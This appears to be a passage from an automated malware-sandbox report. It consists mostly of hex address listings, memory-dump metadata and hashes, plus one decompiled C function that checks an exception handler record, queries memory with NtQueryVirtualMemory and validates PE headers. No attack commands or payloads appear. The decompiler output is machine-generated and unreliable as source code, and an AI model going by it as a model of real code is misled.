                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82487
                                                                                                                                                                                              0x00a82487
                                                                                                                                                                                              0x00a82487
                                                                                                                                                                                              0x00a8248e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82490
                                                                                                                                                                                              0x00a82491
                                                                                                                                                                                              0x00a82493
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82493
                                                                                                                                                                                              0x00a824bb
                                                                                                                                                                                              0x00a824bd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a824cd
                                                                                                                                                                                              0x00a824cf
                                                                                                                                                                                              0x00a824d1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a824d7
                                                                                                                                                                                              0x00a824de
                                                                                                                                                                                              0x00a8250a
                                                                                                                                                                                              0x00a8250a
                                                                                                                                                                                              0x00a8250c
                                                                                                                                                                                              0x00a8250e
                                                                                                                                                                                              0x00a82522
                                                                                                                                                                                              0x00a82524
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82510
                                                                                                                                                                                              0x00a82510
                                                                                                                                                                                              0x00a82510
                                                                                                                                                                                              0x00a82519
                                                                                                                                                                                              0x00a8251a
                                                                                                                                                                                              0x00a8251c
                                                                                                                                                                                              0x00a8251e
                                                                                                                                                                                              0x00a8251e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82510
                                                                                                                                                                                              0x00a824e0
                                                                                                                                                                                              0x00a824e3
                                                                                                                                                                                              0x00a824e5
                                                                                                                                                                                              0x00a824f7
                                                                                                                                                                                              0x00a824f7
                                                                                                                                                                                              0x00a824fa
                                                                                                                                                                                              0x00a824fc
                                                                                                                                                                                              0x00a824fc
                                                                                                                                                                                              0x00a824fd
                                                                                                                                                                                              0x00a824fd
                                                                                                                                                                                              0x00a82503
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a824e7
                                                                                                                                                                                              0x00a824e7
                                                                                                                                                                                              0x00a824e7
                                                                                                                                                                                              0x00a824ee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a824f0
                                                                                                                                                                                              0x00a824f0
                                                                                                                                                                                              0x00a824f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a824f1
                                                                                                                                                                                              0x00a824f3
                                                                                                                                                                                              0x00a824f5
                                                                                                                                                                                              0x00a82508
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82508
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a824f5
                                                                                                                                                                                              0x00a82467
                                                                                                                                                                                              0x00a8246a
                                                                                                                                                                                              0x00a8246d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8246f
                                                                                                                                                                                              0x00a82471
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82471
                                                                                                                                                                                              0x00a82436
                                                                                                                                                                                              0x00a82438
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00A824A6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryQueryVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2850889275-0
                                                                                                                                                                                              • Opcode ID: 4335f93b6eed799210dfffa011946ae389b1ce65843f5abbb6c8ac97dd304789
                                                                                                                                                                                              • Instruction ID: 8457ba5d81add2b4db45ed90d8e7c486ac82d9f25b3847e778aa3036e14027ea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4335f93b6eed799210dfffa011946ae389b1ce65843f5abbb6c8ac97dd304789
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0561FF30A006029FDB2DEF69D9A4B7973E5FBA8314B248539D852C7291F734EC82C760
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DFB2FD(long _a4) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				short* _v32;
                                                                                                                                                                                              				void _v36;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                              				signed int _t62;
                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                              				signed int* _t68;
                                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				void _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                              				short* _t87;
                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                              				signed int* _t90;
                                                                                                                                                                                              				long _t91;
                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                              				signed int _t94;
                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                              				signed int _t102;
                                                                                                                                                                                              				void* _t104;
                                                                                                                                                                                              				long _t108;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t108 = _a4;
                                                                                                                                                                                              				_t76 =  *(_t108 + 8);
                                                                                                                                                                                              				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_a4 =  *[fs:0x4];
                                                                                                                                                                                              				_v8 =  *[fs:0x8];
                                                                                                                                                                                              				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                              					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                              					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                              					if(_t102 != 0xffffffff) {
                                                                                                                                                                                              						_t91 = 0;
                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                              						_a4 = 0;
                                                                                                                                                                                              						_t57 = _t76;
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_t80 =  *_t57;
                                                                                                                                                                                              							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                              							if(_t80 == 0xffffffff) {
                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t80 - _t91;
                                                                                                                                                                                              							if(_t80 >= _t91) {
                                                                                                                                                                                              								L20:
                                                                                                                                                                                              								_t63 = 0;
                                                                                                                                                                                              								L60:
                                                                                                                                                                                              								return _t63;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L9:
                                                                                                                                                                                              							__eflags =  *(_t57 + 4);
                                                                                                                                                                                              							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                              								_t12 =  &_a4;
                                                                                                                                                                                              								 *_t12 = _a4 + 1;
                                                                                                                                                                                              								__eflags =  *_t12;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t91 = _t91 + 1;
                                                                                                                                                                                              							_t57 = _t57 + 0xc;
                                                                                                                                                                                              							__eflags = _t91 - _t102;
                                                                                                                                                                                              						} while (_t91 <= _t102);
                                                                                                                                                                                              						__eflags = _a4;
                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							_t81 =  *0xdfd2d8; // 0x0
                                                                                                                                                                                              							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                              							_t58 = 0;
                                                                                                                                                                                              							__eflags = _t81;
                                                                                                                                                                                              							if(_t81 <= 0) {
                                                                                                                                                                                              								L18:
                                                                                                                                                                                              								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                              								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                              								__eflags = _t61;
                                                                                                                                                                                              								if(_t61 < 0) {
                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t62 = _a4;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t62;
                                                                                                                                                                                              								if(_t62 == 0) {
                                                                                                                                                                                              									L59:
                                                                                                                                                                                              									_t63 = _t104;
                                                                                                                                                                                              									goto L60;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                              									if(_v12 != 0x1000000) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                              									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                              										L46:
                                                                                                                                                                                              										_t63 = 1;
                                                                                                                                                                                              										 *0xdfd320 = 1;
                                                                                                                                                                                              										__eflags =  *0xdfd320;
                                                                                                                                                                                              										if( *0xdfd320 != 0) {
                                                                                                                                                                                              											goto L60;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t84 =  *0xdfd2d8; // 0x0
                                                                                                                                                                                              										__eflags = _t84;
                                                                                                                                                                                              										_t93 = _t84;
                                                                                                                                                                                              										if(_t84 <= 0) {
                                                                                                                                                                                              											L51:
                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                              											if(_t93 != 0) {
                                                                                                                                                                                              												L58:
                                                                                                                                                                                              												 *0xdfd320 = 0;
                                                                                                                                                                                              												goto L5;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t77 = 0xf;
                                                                                                                                                                                              											__eflags = _t84 - _t77;
                                                                                                                                                                                              											if(_t84 <= _t77) {
                                                                                                                                                                                              												_t77 = _t84;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t94 = 0;
                                                                                                                                                                                              											__eflags = _t77;
                                                                                                                                                                                              											if(_t77 < 0) {
                                                                                                                                                                                              												L56:
                                                                                                                                                                                              												__eflags = _t84 - 0x10;
                                                                                                                                                                                              												if(_t84 < 0x10) {
                                                                                                                                                                                              													_t86 = _t84 + 1;
                                                                                                                                                                                              													__eflags = _t86;
                                                                                                                                                                                              													 *0xdfd2d8 = _t86;
                                                                                                                                                                                              												}
                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                              											} else {
                                                                                                                                                                                              												do {
                                                                                                                                                                                              													_t68 = 0xdfd2e0 + _t94 * 4;
                                                                                                                                                                                              													_t94 = _t94 + 1;
                                                                                                                                                                                              													__eflags = _t94 - _t77;
                                                                                                                                                                                              													 *_t68 = _t110;
                                                                                                                                                                                              													_t110 =  *_t68;
                                                                                                                                                                                              												} while (_t94 <= _t77);
                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                              											}
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t69 = 0xdfd2dc + _t84 * 4;
                                                                                                                                                                                              										while(1) {
                                                                                                                                                                                              											__eflags =  *_t69 - _t110;
                                                                                                                                                                                              											if( *_t69 == _t110) {
                                                                                                                                                                                              												goto L51;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											_t93 = _t93 - 1;
                                                                                                                                                                                              											_t69 = _t69 - 4;
                                                                                                                                                                                              											__eflags = _t93;
                                                                                                                                                                                              											if(_t93 > 0) {
                                                                                                                                                                                              												continue;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											goto L51;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L51;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t87 = _v32;
                                                                                                                                                                                              									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                              									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                              									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                              									if( *_t71 != 0x4550) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                              									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t78 = _t76 - _t87;
                                                                                                                                                                                              									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                              									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                              									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                              									__eflags = _t78 - _t72;
                                                                                                                                                                                              									if(_t78 < _t72) {
                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                              									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                              										goto L46;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                              									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                              										goto L20;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L16;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								L16:
                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0xdfd2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                              								if( *((intOrPtr*)(0xdfd2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t58 = _t58 + 1;
                                                                                                                                                                                              								__eflags = _t58 - _t81;
                                                                                                                                                                                              								if(_t58 < _t81) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                              							if(_t58 <= 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *0xdfd320 = 1;
                                                                                                                                                                                              							__eflags =  *0xdfd320;
                                                                                                                                                                                              							if( *0xdfd320 != 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(0xdfd2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                              							if( *((intOrPtr*)(0xdfd2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                              								L32:
                                                                                                                                                                                              								_t100 = 0;
                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                              								if(_t58 < 0) {
                                                                                                                                                                                              									L34:
                                                                                                                                                                                              									 *0xdfd320 = 0;
                                                                                                                                                                                              									goto L5;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									L33:
                                                                                                                                                                                              									_t90 = 0xdfd2e0 + _t100 * 4;
                                                                                                                                                                                              									_t100 = _t100 + 1;
                                                                                                                                                                                              									__eflags = _t100 - _t58;
                                                                                                                                                                                              									 *_t90 = _t110;
                                                                                                                                                                                              									_t110 =  *_t90;
                                                                                                                                                                                              								} while (_t100 <= _t58);
                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t25 = _t81 - 1; // -1
                                                                                                                                                                                              							_t58 = _t25;
                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                              							if(_t58 < 0) {
                                                                                                                                                                                              								L28:
                                                                                                                                                                                              								__eflags = _t81 - 0x10;
                                                                                                                                                                                              								if(_t81 < 0x10) {
                                                                                                                                                                                              									_t81 = _t81 + 1;
                                                                                                                                                                                              									__eflags = _t81;
                                                                                                                                                                                              									 *0xdfd2d8 = _t81;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                              								_t58 = _t28;
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								L25:
                                                                                                                                                                                              								__eflags =  *((intOrPtr*)(0xdfd2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                              								if( *((intOrPtr*)(0xdfd2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t58 = _t58 - 1;
                                                                                                                                                                                              								__eflags = _t58;
                                                                                                                                                                                              								if(_t58 >= 0) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                              						__eflags = _t75 - _v8;
                                                                                                                                                                                              						if(_t75 < _v8) {
                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__eflags = _t75 - _t108;
                                                                                                                                                                                              						if(_t75 >= _t108) {
                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                              					goto L60;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}




































                                                                                                                                                                                              0x00dfb307
                                                                                                                                                                                              0x00dfb30a
                                                                                                                                                                                              0x00dfb310
                                                                                                                                                                                              0x00dfb32e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb32e
                                                                                                                                                                                              0x00dfb318
                                                                                                                                                                                              0x00dfb321
                                                                                                                                                                                              0x00dfb327
                                                                                                                                                                                              0x00dfb336
                                                                                                                                                                                              0x00dfb339
                                                                                                                                                                                              0x00dfb33c
                                                                                                                                                                                              0x00dfb346
                                                                                                                                                                                              0x00dfb346
                                                                                                                                                                                              0x00dfb348
                                                                                                                                                                                              0x00dfb34b
                                                                                                                                                                                              0x00dfb34d
                                                                                                                                                                                              0x00dfb34d
                                                                                                                                                                                              0x00dfb34f
                                                                                                                                                                                              0x00dfb352
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb354
                                                                                                                                                                                              0x00dfb356
                                                                                                                                                                                              0x00dfb3bc
                                                                                                                                                                                              0x00dfb3bc
                                                                                                                                                                                              0x00dfb51a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb51a
                                                                                                                                                                                              0x00dfb358
                                                                                                                                                                                              0x00dfb358
                                                                                                                                                                                              0x00dfb35c
                                                                                                                                                                                              0x00dfb35e
                                                                                                                                                                                              0x00dfb35e
                                                                                                                                                                                              0x00dfb35e
                                                                                                                                                                                              0x00dfb35e
                                                                                                                                                                                              0x00dfb361
                                                                                                                                                                                              0x00dfb362
                                                                                                                                                                                              0x00dfb365
                                                                                                                                                                                              0x00dfb365
                                                                                                                                                                                              0x00dfb369
                                                                                                                                                                                              0x00dfb36d
                                                                                                                                                                                              0x00dfb37b
                                                                                                                                                                                              0x00dfb37b
                                                                                                                                                                                              0x00dfb383
                                                                                                                                                                                              0x00dfb389
                                                                                                                                                                                              0x00dfb38b
                                                                                                                                                                                              0x00dfb38d
                                                                                                                                                                                              0x00dfb39d
                                                                                                                                                                                              0x00dfb3aa
                                                                                                                                                                                              0x00dfb3ae
                                                                                                                                                                                              0x00dfb3b3
                                                                                                                                                                                              0x00dfb3b5
                                                                                                                                                                                              0x00dfb433
                                                                                                                                                                                              0x00dfb433
                                                                                                                                                                                              0x00dfb3b7
                                                                                                                                                                                              0x00dfb3b7
                                                                                                                                                                                              0x00dfb3b7
                                                                                                                                                                                              0x00dfb435
                                                                                                                                                                                              0x00dfb437
                                                                                                                                                                                              0x00dfb518
                                                                                                                                                                                              0x00dfb518
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb43d
                                                                                                                                                                                              0x00dfb43d
                                                                                                                                                                                              0x00dfb444
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb44a
                                                                                                                                                                                              0x00dfb44e
                                                                                                                                                                                              0x00dfb4aa
                                                                                                                                                                                              0x00dfb4ac
                                                                                                                                                                                              0x00dfb4b4
                                                                                                                                                                                              0x00dfb4b6
                                                                                                                                                                                              0x00dfb4b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4ba
                                                                                                                                                                                              0x00dfb4c0
                                                                                                                                                                                              0x00dfb4c2
                                                                                                                                                                                              0x00dfb4c4
                                                                                                                                                                                              0x00dfb4d9
                                                                                                                                                                                              0x00dfb4d9
                                                                                                                                                                                              0x00dfb4db
                                                                                                                                                                                              0x00dfb50a
                                                                                                                                                                                              0x00dfb511
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb511
                                                                                                                                                                                              0x00dfb4df
                                                                                                                                                                                              0x00dfb4e0
                                                                                                                                                                                              0x00dfb4e2
                                                                                                                                                                                              0x00dfb4e4
                                                                                                                                                                                              0x00dfb4e4
                                                                                                                                                                                              0x00dfb4e6
                                                                                                                                                                                              0x00dfb4e8
                                                                                                                                                                                              0x00dfb4ea
                                                                                                                                                                                              0x00dfb4fe
                                                                                                                                                                                              0x00dfb4fe
                                                                                                                                                                                              0x00dfb501
                                                                                                                                                                                              0x00dfb503
                                                                                                                                                                                              0x00dfb503
                                                                                                                                                                                              0x00dfb504
                                                                                                                                                                                              0x00dfb504
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4ec
                                                                                                                                                                                              0x00dfb4ec
                                                                                                                                                                                              0x00dfb4ec
                                                                                                                                                                                              0x00dfb4f5
                                                                                                                                                                                              0x00dfb4f6
                                                                                                                                                                                              0x00dfb4f8
                                                                                                                                                                                              0x00dfb4fa
                                                                                                                                                                                              0x00dfb4fa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4ec
                                                                                                                                                                                              0x00dfb4ea
                                                                                                                                                                                              0x00dfb4c6
                                                                                                                                                                                              0x00dfb4cd
                                                                                                                                                                                              0x00dfb4cd
                                                                                                                                                                                              0x00dfb4cf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4d1
                                                                                                                                                                                              0x00dfb4d2
                                                                                                                                                                                              0x00dfb4d5
                                                                                                                                                                                              0x00dfb4d7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4d7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4cd
                                                                                                                                                                                              0x00dfb450
                                                                                                                                                                                              0x00dfb453
                                                                                                                                                                                              0x00dfb458
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb461
                                                                                                                                                                                              0x00dfb463
                                                                                                                                                                                              0x00dfb469
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb46f
                                                                                                                                                                                              0x00dfb475
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb47b
                                                                                                                                                                                              0x00dfb47d
                                                                                                                                                                                              0x00dfb486
                                                                                                                                                                                              0x00dfb48a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb490
                                                                                                                                                                                              0x00dfb493
                                                                                                                                                                                              0x00dfb495
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb49c
                                                                                                                                                                                              0x00dfb49e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4a0
                                                                                                                                                                                              0x00dfb4a4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb4a4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb38f
                                                                                                                                                                                              0x00dfb38f
                                                                                                                                                                                              0x00dfb38f
                                                                                                                                                                                              0x00dfb396
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb398
                                                                                                                                                                                              0x00dfb399
                                                                                                                                                                                              0x00dfb39b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb39b
                                                                                                                                                                                              0x00dfb3c3
                                                                                                                                                                                              0x00dfb3c5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb3d5
                                                                                                                                                                                              0x00dfb3d7
                                                                                                                                                                                              0x00dfb3d9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb3df
                                                                                                                                                                                              0x00dfb3e6
                                                                                                                                                                                              0x00dfb412
                                                                                                                                                                                              0x00dfb412
                                                                                                                                                                                              0x00dfb414
                                                                                                                                                                                              0x00dfb416
                                                                                                                                                                                              0x00dfb42a
                                                                                                                                                                                              0x00dfb42c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb418
                                                                                                                                                                                              0x00dfb418
                                                                                                                                                                                              0x00dfb418
                                                                                                                                                                                              0x00dfb421
                                                                                                                                                                                              0x00dfb422
                                                                                                                                                                                              0x00dfb424
                                                                                                                                                                                              0x00dfb426
                                                                                                                                                                                              0x00dfb426
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb418
                                                                                                                                                                                              0x00dfb3e8
                                                                                                                                                                                              0x00dfb3e8
                                                                                                                                                                                              0x00dfb3eb
                                                                                                                                                                                              0x00dfb3ed
                                                                                                                                                                                              0x00dfb3ff
                                                                                                                                                                                              0x00dfb3ff
                                                                                                                                                                                              0x00dfb402
                                                                                                                                                                                              0x00dfb404
                                                                                                                                                                                              0x00dfb404
                                                                                                                                                                                              0x00dfb405
                                                                                                                                                                                              0x00dfb405
                                                                                                                                                                                              0x00dfb40b
                                                                                                                                                                                              0x00dfb40b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb3ef
                                                                                                                                                                                              0x00dfb3ef
                                                                                                                                                                                              0x00dfb3ef
                                                                                                                                                                                              0x00dfb3f6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb3f8
                                                                                                                                                                                              0x00dfb3f8
                                                                                                                                                                                              0x00dfb3f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb3f9
                                                                                                                                                                                              0x00dfb3fb
                                                                                                                                                                                              0x00dfb3fd
                                                                                                                                                                                              0x00dfb410
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb410
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfb3fd
                                                                                                                                                                                              0x00dfb36f
                                                                                                                                                                                              0x00dfb372
                                                                                                                                                                                              0x00dfb375
                                                                                                                                                                                              0x00000000
